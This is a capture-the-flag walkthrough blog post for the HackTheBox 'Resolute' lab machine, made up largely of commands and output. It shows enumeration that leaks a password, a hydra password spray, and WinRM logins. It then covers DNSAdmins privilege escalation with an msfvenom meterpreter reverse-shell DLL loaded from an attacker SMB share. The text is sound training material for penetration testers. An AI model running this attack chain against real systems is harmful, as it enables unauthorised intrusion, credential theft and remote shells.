HackTheBox - Resolute ๐Ÿ“Ÿ ๐Ÿ”ฅ

HackTheBox โ€บ PenTesting
, , , , ,

HackTheBox-OpenAdmin

Quick Summary

โ†’ Resolute run as medium machine but an easy boxโ€™ in the first phase you easily find the users of the box and 1 password by using enum4linux. I run hydra to bruteforce the users using 1 password and easily got right creds with melanie. I use the creds to get with evil-winrm and got the user.txt. The root part was gave me a little bit headache causeโ€™ there was Anti-Virus inside the machine and I always disconnected when I transfer a file like nc.exe or winPEAS.exe for privilege escalation. As my enumeration there was another user ryan which his password is hidden in the directory. Then after I found itโ€™ I switch to ryan from user melanie. When doing enumeration i found that ryan is part of DNSAdmins that I can abuse it by adding malicious DLL in the serverplugin. Using impacket-smbserver i can load my dll file to machine. Restarting the dns service then I will able to execute my dll as administrator.

Penetration Testing Methodologies

  1. Network Scanning

    โ†’ Nmap scan

    โ†’ discover open ports and what services are running

  2. Enumeration

    โ†’ run enum4linux gives some usernames and 1 password which can be use that later

  3. Post - Exploitation

    โ†’ with Hydra I brute force all the usernames with only 1 password, the password is right belong to melanie

    โ†’ using Evil-WinRM to login as melanie and got the user.txt

  4. Exploitation

    โ†’ enumerating the file directory there was another user ryan

    โ†’ using ls -hidden we see a file which contains juicy information

    โ†’ by reading the .txt file I got the password of ryan then switch user.

  5. Privilege Escalation

    โ†’ create a malicious dll file with msfvenom

    โ†’ load my dll file with impacket-smbserver

    โ†’ running my meterpreter session

    โ†’ stop and start dns service

    โ†’ finally I got the administrator and root.txt

Network Scanning

Walkthrough

โ†’ I always begin at NMAP to look on the services what is running. I always use

  • -sV โ‡’ Probe open ports to determine service/version info
  • -sC โ‡’ equivalent to โ€”script=default
  • -A โ‡’ Agressive scan
  • -oN โ‡’ to save our scan results to a text file
# bash

nmap -sV -sC -A 10.10.10.169 -oN nmap-Resolute

# bash

root in htb/boxes/Resolute
โฏ nmap -sV -sC -A -oN nmap-Resolute 10.10.10.169
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-29 06:59 PST
WARNING: RST from 10.10.10.169 port 53 -- is this port really open?
WARNING: RST from 10.10.10.169 port 53 -- is this port really open?
Nmap scan report for 10.10.10.169
Host is up (0.26s latency).
Not shown: 989 closed ports
PORT     STATE SERVICE      VERSION
53/tcp   open  domain?
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2020-05-30 23:11:35Z)
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=5/31%Time=5ED2E596%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=5/31%OT=53%CT=1%CU=35791%PV=Y%DS=2%DC=T%G=Y%TM=5ED2E64
OS:6%P=x86_64-pc-linux-gnu)SEQ(SP=F9%GCD=4%ISR=109%TI=RD%CI=I%II=I%TS=8)SEQ
OS:(SP=102%GCD=1%ISR=104%TI=I%CI=I%II=I%SS=O%TS=A)OPS(O1=%O2=%O3=M54DNW8NNT
OS:11%O4=M54DNW8ST11%O5=M54DNW8ST11%O6=M54DST11)WIN(W1=0%W2=0%W3=2000%W4=20
OS:00%W5=2000%W6=2000)ECN(R=Y%DF=Y%T=80%W=2000%O=M54DNW8NNS%CC=Y%Q=)T1(R=Y%
OS:DF=Y%T=80%S=Z%A=S+%F=AR%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=
OS:0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S
OS:=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R
OS:=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=
OS:AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%
OS:RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)

Network Distance: 2 hops
Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h31m01s, deviation: 4h02m30s, median: 11m00s
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Resolute
|   NetBIOS computer name: RESOLUTE\x00
|   Domain name: megabank.local
|   Forest name: megabank.local
|   FQDN: Resolute.megabank.local
|_  System time: 2020-05-30T16:12:18-07:00
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2020-05-30T23:12:22
|_  start_date: 2020-05-30T22:15:46

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   210.01 ms 10.10.14.1
2   217.91 ms 10.10.10.169

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun May 31 07:03:34 2020 -- 1 IP address (1 host up) scanned in 216.34 seconds

root in htb/boxes/Resolute took 2m8s 
โฏ

Weโ€™ve got a lot of open ports. but the interesting was the port :

445(smb), 53(dns), 88(kerberos) and 5985(WinRM).

Enumeration

Enum4linux

to enumerate some juicy information to box, i use enum4linux so letโ€™s see :

# bash

root in htb/boxes/Resolute 
โฏ enum4linux -o -U -G -S 10.10.10.169
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun May 31 08:06:03 2020

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 10.10.10.169
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ==================================================== 
|    Enumerating Workgroup/Domain on 10.10.10.169    |
 ====================================================

As you can see here thereโ€™s a lot of users but only 1 password Welcome123! and it use to user marko

# bash

 ============================= 
|    Users on 10.10.10.169    |
 ============================= 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 866.
index: 0x10b0 RID: 0x19ca acb: 0x00000010 Account: abigail      Name: (null)    Desc: (null)
index: 0xfbc RID: 0x1f4 acb: 0x00000210 Account: Administrator  Name: (null)    Desc: Built-in account for administering the computer/domain
index: 0x10b4 RID: 0x19ce acb: 0x00000010 Account: angela       Name: (null)    Desc: (null)
index: 0x10bc RID: 0x19d6 acb: 0x00000010 Account: annette      Name: (null)    Desc: (null)
index: 0x10bd RID: 0x19d7 acb: 0x00000010 Account: annika       Name: (null)    Desc: (null)
index: 0x10b9 RID: 0x19d3 acb: 0x00000010 Account: claire       Name: (null)    Desc: (null)
index: 0x10bf RID: 0x19d9 acb: 0x00000010 Account: claude       Name: (null)    Desc: (null)
index: 0xfbe RID: 0x1f7 acb: 0x00000215 Account: DefaultAccount Name: (null)    Desc: A user account managed by the system.
index: 0x10b5 RID: 0x19cf acb: 0x00000010 Account: felicia      Name: (null)    Desc: (null)
index: 0x10b3 RID: 0x19cd acb: 0x00000010 Account: fred Name: (null)    Desc: (null)
index: 0xfbd RID: 0x1f5 acb: 0x00000215 Account: Guest  Name: (null)    Desc: Built-in account for guest access to the computer/domain
index: 0x10b6 RID: 0x19d0 acb: 0x00000010 Account: gustavo      Name: (null)    Desc: (null)
index: 0xff4 RID: 0x1f6 acb: 0x00000011 Account: krbtgt Name: (null)    Desc: Key Distribution Center Service Account
index: 0x10b1 RID: 0x19cb acb: 0x00000010 Account: marcus       Name: (null)    Desc: (null)
index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko Name: Marko Novak       Desc: Account created. Password set to Welcome123!
index: 0x10c0 RID: 0x2775 acb: 0x00000010 Account: melanie      Name: (null)    Desc: (null)
index: 0x10c3 RID: 0x2778 acb: 0x00000010 Account: naoki        Name: (null)    Desc: (null)
index: 0x10ba RID: 0x19d4 acb: 0x00000010 Account: paulo        Name: (null)    Desc: (null)
index: 0x10be RID: 0x19d8 acb: 0x00000010 Account: per  Name: (null)    Desc: (null)
index: 0x10a3 RID: 0x451 acb: 0x00000210 Account: ryan  Name: Ryan Bertrand     Desc: (null)
index: 0x10b2 RID: 0x19cc acb: 0x00000010 Account: sally        Name: (null)    Desc: (null)
index: 0x10c2 RID: 0x2777 acb: 0x00000010 Account: simon        Name: (null)    Desc: (null)
index: 0x10bb RID: 0x19d5 acb: 0x00000010 Account: steve        Name: (null)    Desc: (null)
index: 0x10b8 RID: 0x19d2 acb: 0x00000010 Account: stevie       Name: (null)    Desc: (null)
index: 0x10af RID: 0x19c9 acb: 0x00000010 Account: sunita       Name: (null)    Desc: (null)
index: 0x10b7 RID: 0x19d1 acb: 0x00000010 Account: ulf  Name: (null)    Desc: (null)
index: 0x10c1 RID: 0x2776 acb: 0x00000010 Account: zach Name: (null)    Desc: (null)


[1]+  Stopped                 enum4linux -o -U -G -S 10.10.10.169

root in htb/boxes/Resolute took 2m4s 
โฏ

as you can see in this line there was a lot of username but only 1 password that belong to marko

# bash

index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko Name: Marko Novak       Desc: Account created. Password set to Welcome123!

Post - Exploitation

Evil-WinRM

I login it with evil-winrm but it failed ! so, i decided to use hydra and save all the usernames on a text file and bruteforce it with only 1 password :

# bash

root in htb/boxes/Resolute 
โฏ hydra -t 1 -V -f -L users.txt -p "Welcome123!" 10.10.10.169 smb
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-05-31 08:09:55
[DATA] max 1 task per 1 server, overall 1 task, 24 login tries (l:24/p:1), ~24 tries per task
[DATA] attacking smb://10.10.10.169:445/
[ATTEMPT] target 10.10.10.169 - login "abigail" - pass "Welcome123!" - 1 of 24 [child 0] (0/0)
[ATTEMPT] target 10.10.10.169 - login "angela" - pass "Welcome123!" - 2 of 24 [child 0] (0/0)
[ATTEMPT] target 10.10.10.169 - login "annette" - pass "Welcome123!" - 3 of 24 [child 0] (0/0)
[ATTEMPT] target 10.10.10.169 - login "annika" - pass "Welcome123!" - 4 of 24 [child 0] (0/0)
[ATTEMPT] target 10.10.10.169 - login "claire" - pass "Welcome123!" - 5 of 24 [child 0] (0/0)
[ATTEMPT] target 10.10.10.169 - login "claude" - pass "Welcome123!" - 6 of 24 [child 0] (0/0)
[ATTEMPT] target 10.10.10.169 - login "felicia" - pass "Welcome123!" - 7 of 24 [child 0] (0/0)
[ATTEMPT] target 10.10.10.169 - login "fred" - pass "Welcome123!" - 8 of 24 [child 0] (0/0)
[ATTEMPT] target 10.10.10.169 - login "gustavo" - pass "Welcome123!" - 9 of 24 [child 0] (0/0)
[ATTEMPT] target 10.10.10.169 - login "Guest" - pass "Welcome123!" - 10 of 24 [child 0] (0/0)
[ATTEMPT] target 10.10.10.169 - login "marcus" - pass "Welcome123!" - 11 of 24 [child 0] (0/0)
[ATTEMPT] target 10.10.10.169 - login "marko" - pass "Welcome123!" - 12 of 24 [child 0] (0/0)
[ATTEMPT] target 10.10.10.169 - login "melanie" - pass "Welcome123!" - 13 of 24 [child 0] (0/0)
[445][smb] host: 10.10.10.169   login: melanie   password: Welcome123!
[STATUS] attack finished for 10.10.10.169 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-05-31 08:10:04

root in htb/boxes/Resolute took 8s 
โฏ

looks easy right ? The password is belong to user melanie now using Evil-WinRM i will try to login it again.

# bash

root in evil-winrm on ๎‚  master via ๐Ÿ’Ž v2.7.0 
โฏ ./evil-winrm.rb -i 10.10.10.169 -u melanie -p Welcome123!

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\melanie\Documents> whoami
megabank\melanie
*Evil-WinRM* PS C:\Users\melanie\Documents>

This one of the easiest user part I experienced, now letโ€™s grab the user.txt then move to privilege escalation.

# bash

*Evil-WinRM* PS C:\Users\melanie\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\melanie\Desktop> Get-Content "user.txt" | Measure-Object -Character -Word

Lines Words Characters Property
----- ----- ---------- --------
          1         32


*Evil-WinRM* PS C:\Users\melanie\Desktop>

Exploitation

Transfer file with SAMBA

the enumeration starts again, i try to transfer first winPEAS.exe it is similar to LinEnum.sh for Linux kernel, it helps penetration testers to find some useful info that they can use for privilege escalation so first i setup my smb configuration.

# bash

[global]
workgroup = WORKGROUP
server string - Samba Server %v
netbios name = Payas0
security = user
map to guest = bad user
name to resolve order = bcast host
dns proxy = no
bind interfaces only = yes

[medz]
path = /root/htb/boxes/Resolute/
writable = no
guest ok = yes
guest only = yes
read only = yes
directory mode = 0555
force user = nobody

then start service :

# bash

root in htb/boxes/Resolute 
โฏ smbd service restart

now copy the winPEAS.exe with samba

# bash

*Evil-WinRM* PS C:\Users\melanie\Documents> copy \\10.10.14.187\medz\winPEAS.exe

but this one failed me. The machine has a Anti-virus it always disconnect me when I try to transfer a file like nc.exe or winPEAS so letโ€™s do another thingโ€™ enumerate the directories.

Hidden directories

# bash

*Evil-WinRM* PS C:\Users\melanie\Documents> cd /
*Evil-WinRM* PS C:\> ls -hidden


    Directory: C:\


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d--hs-        12/3/2019   6:40 AM                $RECYCLE.BIN
d--hsl        9/25/2019  10:17 AM                Documents and Settings
d--h--        9/25/2019  10:48 AM                ProgramData
d--h--        12/3/2019   6:32 AM                PSTranscripts
d--hs-        9/25/2019  10:17 AM                Recovery
d--hs-        9/25/2019   6:25 AM                System Volume Information
-arhs-       11/20/2016   5:59 PM         389408 bootmgr
-a-hs-        7/16/2016   6:10 AM              1 BOOTNXT
-a-hs-        5/30/2020   3:15 PM      402653184 pagefile.sys


*Evil-WinRM* PS C:\>

The PSTranscripts is very interesting because that is not a default file of a windows. so looking inside of that folder :

# bash

*Evil-WinRM* PS C:\> cd PSTranscripts
*Evil-WinRM* PS C:\PSTranscripts> dir
*Evil-WinRM* PS C:\PSTranscripts> ls -hidden


    Directory: C:\PSTranscripts


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d--h--        12/3/2019   6:45 AM                20191203


*Evil-WinRM* PS C:\PSTranscripts>

dir command will not show whatโ€™s really inside of the folder so I use ls -hidden to show the hidden files. and thereโ€™s another folder 20191203

# bash

*Evil-WinRM* PS C:\PSTranscripts> cd 20191203
*Evil-WinRM* PS C:\PSTranscripts\20191203> ls -hidden


    Directory: C:\PSTranscripts\20191203


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-arh--        12/3/2019   6:45 AM           3732 PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt


*Evil-WinRM* PS C:\PSTranscripts\20191203>

very interesting ! letโ€™s see whatโ€™s inside of that text file.

# bash

*Evil-WinRM* PS C:\PSTranscripts\20191203> more PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
**********************
Windows PowerShell transcript start
Start time: 20191203063201
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
Command start time: 20191203063455
**********************
PS>TerminatingError(): "System error."
>> CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="Stream"; value="True"
**********************
Command start time: 20191203063455
**********************
PS>ParameterBinding(Out-String): name="InputObject"; value="PS megabank\ryan@RESOLUTE Documents> "
PS megabank\ryan@RESOLUTE Documents>
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!

if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="Stream"; value="True"
**********************
Windows PowerShell transcript start
Start time: 20191203063515
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="InputObject"; value="The syntax of this command is:"
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (The syntax of this command is::String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (The syntax of this command is::String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
**********************
Windows PowerShell transcript start
Start time: 20191203063515
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************

*Evil-WinRM* PS C:\PSTranscripts\20191203>

looking at this I got another user ryan and his possible password Serv3r4Admin4cc123!

# bash

+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!

Now from melanie i switch to user ryan and starts the enumeration again.

# bash

root in evil-winrm on ๎‚  master via ๐Ÿ’Ž v2.7.0 
โฏ ./evil-winrm.rb -i 10.10.10.169 -u ryan -p 'Serv3r4Admin4cc123!' -e . -s .

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\ryan\Documents> 




*Evil-WinRM* PS C:\Users\ryan\Documents>


Privilege Escalation

Abusing DNSAdmins privilege for escalation in Active Directory

Now letโ€™s start to enumerate it again i checked it with whoami /all

# bash

*Evil-WinRM* PS C:\Users\ryan\Documents> whoami /all

USER INFORMATION
----------------

User Name     SID
============= ==============================================
megabank\ryan S-1-5-21-1392959593-3013219662-3596683436-1105


GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                            Attributes
========================================== ================ ============================================== ===============================================================
Everyone                                   Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
MEGABANK\Contractors                       Group            S-1-5-21-1392959593-3013219662-3596683436-1103 Mandatory group, Enabled by default, Enabled group
MEGABANK\DnsAdmins                         Alias            S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======                                                                                                                      
SeMachineAccountPrivilege     Add workstations to domain     Enabled                                                                                                                      
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled                                                                                                                      
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled                                                                                                                      
                                                                                                                                                                                          
                                                                                                                                                                                          
USER CLAIMS INFORMATION                                                                                                                                                                   
-----------------------                                                                                                                                                                   

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.
*Evil-WinRM* PS C:\Users\ryan\Documents>


looking at this lineโ€™ ryan is part of DNSAdmin Group. This privilege is prone to privilege escation vulnerabilty which allows any user inside this grupo to make the DNS service load an arbitrary DLL correctly constructed.

# bash

MEGABANK\DnsAdmins                         Alias            S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group

with this help of this article and this one we can get the administrator from DNS

Creating malicious DLL

we know that the machineโ€™ have anti-virus so I canโ€™t load a malicious file inside to get a reverse shell. so I tried to use impacket-smbserver to load my dll file from my operating system and bypass the av protection. so first I created a dll file with msfvenom

# bash

root in htb/boxes/Resolute 
โฏ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.187 LPORT=9001 -a x64 -f dll > main.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 510 bytes
Final size of dll file: 5120 bytes

root in htb/boxes/Resolute 12s
โฏ

Next i setup my impacket-smbserver in the path where my dll is loaded .

# bash

root in htb/boxes/Resolute 
โฏ python3 /usr/share/doc/python3-impacket/examples/smbserver.py SHARE /root/htb/boxes/Resolute
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed


Setup Impacket-smbserver

next is to load my dll file in the entry serverlevelplugindll in the box :

# bash

*Evil-WinRM* PS C:\Users\ryan\Documents> dnscmd /config /serverlevelplugindll \\10.10.14.187\SHARE\main.dll

Registry property serverlevelplugindll successfully reset.
Command completed successfully.

*Evil-WinRM* PS C:\Users\ryan\Documents>


to make sure that i successfully connect it we can checked it with this command :

# bash

*Evil-WinRM* PS C:\Users\ryan\Documents> dir \\10.10.14.187\SHARE


    Directory: \\10.10.14.187\SHARE


Mode                LastWriteTime         Length Name
----                -------------         ------ ----

-a----        5/30/2020   4:36 PM             12 password.txt
-a----        5/31/2020   5:13 AM           5120 main.dll
-a----        5/30/2020   4:03 PM           3512 nmap-Resolute
-a----        5/30/2020   4:32 PM            154 users.txt
-a----        5/30/2020   7:51 PM          59392 nc.exe
-a----        5/30/2020   5:18 PM         241664 winPEAS.exe


*Evil-WinRM* PS C:\Users\ryan\Documents>


Success ! the machine has connected with my operating system as they can view my files to the path where i set my SHARE my impacket-smbserver is also responding.

# bash

root in htb/boxes/Resolute 
โฏ python3 /usr/share/doc/python3-impacket/examples/smbserver.py SHARE /root/htb/boxes/Resolute
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.169,59611)
[*] AUTHENTICATE_MESSAGE (\,RESOLUTE)
[*] User RESOLUTE\ authenticated successfully
[*] :::00::4141414141414141
[*] Disconnecting Share(1:SHARE)
[*] Handle: 'ConnectionResetError' object is not subscriptable
[*] Closing down connection (10.10.10.169,59611)
[*] Remaining connections []
[*] Incoming connection (10.10.10.169,59760)
[*] AUTHENTICATE_MESSAGE (MEGABANK\RESOLUTE$,RESOLUTE)
[*] User RESOLUTE\RESOLUTE$ authenticated successfully
[*] RESOLUTE$::MEGABANK:4141414141414141:6bf4545d80d2f13607b0c9d3f91bd604:010100000000000080adb2044837d601ec836f15824f4098000000000100100078005700710051006a0067004a004f000300100078005700710051006a0067004a004f00020010006b00540075006600480053004f006c00040010006b00540075006600480053004f006c000700080080adb2044837d60106000400020000000800300030000000000000000000000000400000318efa794fd558b74c119e534800bb85deca03c294098a118af41f41a36559c40a001000000000000000000000000000000000000900220063006900660073002f00310030002e00310030002e00310034002e003100380037000000000000000000
[*] Disconnecting Share(1:SHARE)
[*] Handle: 'ConnectionResetError' object is not subscriptable
[*] Closing down connection (10.10.10.169,59760)
[*] Remaining connections []


Now letโ€™s run metasploit with meterpreter sessions and start listening .

Setup Meterpreter session

# bash

root in htb/boxes/Resolute 
โฏ msfconsole
[!] The following modules could not be loaded!../
[!]     /root/.msf4/modules/exploits/cgi/webapps/wordpress_userpro.rb
[!] Please see /root/.msf4/logs/framework.log for details.
                                                  
               .;lxO0KXXXK0Oxl:.
           ,o0WMMMMMMMMMMMMMMMMMMKd,
        'xNMMMMMMMMMMMMMMMMMMMMMMMMMWx,
      :KMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMK:
    .KMMMMMMMMMMMMMMMWNNNWMMMMMMMMMMMMMMMX,
   lWMMMMMMMMMMMXd:..     ..;dKMMMMMMMMMMMMo
  xMMMMMMMMMMWd.               .oNMMMMMMMMMMk
 oMMMMMMMMMMx.                    dMMMMMMMMMMx
.WMMMMMMMMM:                       :MMMMMMMMMM,
xMMMMMMMMMo                         lMMMMMMMMMO
NMMMMMMMMW                    ,cccccoMMMMMMMMMWlccccc;
MMMMMMMMMX                     ;KMMMMMMMMMMMMMMMMMMX:
NMMMMMMMMW.                      ;KMMMMMMMMMMMMMMX:
xMMMMMMMMMd                        ,0MMMMMMMMMMK;
.WMMMMMMMMMc                         'OMMMMMM0,
 lMMMMMMMMMMk.                         .kMMO'
  dMMMMMMMMMMWd'                         ..
   cWMMMMMMMMMMMNxc'.                ##########
    .0MMMMMMMMMMMMMMMMWc            #+#    #+#
      ;0MMMMMMMMMMMMMMMo.          +:+
        .dNMMMMMMMMMMMMo          +#++:++#+
           'oOWMMMMMMMMo                +:+
               .,cdkO0K;        :+:    :+:                                
                                :::::::+:
                      Metasploit

       =[ metasploit v5.0.87-dev                          ]
+ -- --=[ 2006 exploits - 1096 auxiliary - 343 post       ]
+ -- --=[ 562 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

Metasploit tip: When in a module, use back to go back to the top level prompt

msf5 > use exploit/multi/handler                                                                                                                                                          
msf5 exploit(multi/handler) > set LHOST 10.10.14.187
LHOST => 10.10.14.187                                                                                                                                                                     
msf5 exploit(multi/handler) > set LPORT 9001
LPORT => 9001                                                                                                                                                                             
msf5 exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp                                                                                                                                            
msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 10.10.14.187:9001


all things now are setup. so now I will do the exploitationโ€™ i will load again my dll file.

# bash

*Evil-WinRM* PS C:\Users\ryan\Documents> dnscmd /config /serverlevelplugindll \\10.10.14.187\SHARE\main.dll

Registry property serverlevelplugindll successfully reset.
Command completed successfully.

*Evil-WinRM* PS C:\Users\ryan\Documents>


so based on the article I will stop and start the dns services, this will invoke my dll file and captured meterpreter shell.

# bash

*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe stop dns

SERVICE_NAME: dns
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 3  STOP_PENDING
                                (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
